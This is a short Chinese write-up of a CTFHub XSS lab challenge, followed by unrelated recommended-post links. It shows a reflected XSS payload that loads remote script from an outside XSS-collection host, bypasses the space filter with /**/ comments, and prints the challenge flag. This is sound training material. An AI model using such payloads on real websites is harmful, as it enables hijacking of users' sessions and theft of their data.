CTFHUB技能树之XSS——过滤空格

南暮思鸢2024-10-24 22:59

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题

在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理

用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
Configure-Handler14 分钟前
buildroot System configuration
java·服务器·数据库
:Concerto40 分钟前
JavaSE 注解
java·开发语言·sprint
layman05281 小时前
webpack5 css-loader:从基础到原理
前端·css·webpack
半桔1 小时前
【前端小站】CSS 样式美学:从基础语法到界面精筑的实战宝典
前端·css·html
AI老李1 小时前
PostCSS完全指南:功能/配置/插件/SourceMap/AST/插件开发/自定义语法
前端·javascript·postcss
_OP_CHEN1 小时前
【前端开发之CSS】(一)初识 CSS:网页化妆术的终极指南,新手也能轻松拿捏页面美化!
前端·css·html·网页开发·样式表·界面美化
啊哈一半醒1 小时前
CSS 主流布局
前端·css·css布局·标准流 浮动 定位·flex grid 响应式布局
PHP武器库1 小时前
ULUI:不止于按钮和菜单,一个专注于“业务组件”的纯 CSS 框架
前端·css
电商API_180079052471 小时前
第三方淘宝商品详情 API 全维度调用指南:从技术对接到生产落地
java·大数据·前端·数据库·人工智能·网络爬虫
晓晓莺歌1 小时前
vue3某一个路由切换,导致所有路由页面均变成空白页
前端·vue.js
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书032026美赛A题智能手机电池续航时间预测的连续时间数学模型04OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)062025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望07UV安装并设置国内源08Linux下V2Ray安装配置指南09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services10【Milvus】向量数据库pymilvus使用教程